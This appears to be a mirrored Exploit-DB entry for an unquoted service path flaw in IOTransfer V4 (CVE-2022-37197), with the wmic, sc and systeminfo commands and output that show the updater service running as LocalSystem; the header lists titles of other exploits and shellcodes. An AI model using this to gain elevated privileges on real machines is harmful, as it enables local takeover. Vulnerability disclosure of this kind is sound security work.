bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/51029.txt
Offensive Security c9e53fa57b DB: 2022-11-12 
7 changes to exploits/shellcodes/ghdb

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal

MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)

SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)

Open Web Analytics 1.7.3 - Remote Code Execution (RCE)

CVAT 2.0 - SSRF (Server Side Request Forgery)

IOTransfer V4 - Unquoted Service Path

NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)

Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)

Linux/MIPS - reboot() Shellcode (32 bytes)

Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)

Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)

Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
2022-11-12 09:02:02 +00:00

36 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

# Exploit Title: IOTransfer V4 - Unquoted Service Path
# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
# Discovery Date: 2022-28-07
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link: https://iotransfer.itopvpn.com/download/
# Tested Version: V4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
Auto
C:\>sc qc IOTUpdaterSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IOTUpdaterSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IOTransfer Updater
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
OS Name: Microsoft Windows Server 2019 Standard Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
Reference in a new issue View git blame Copy permalink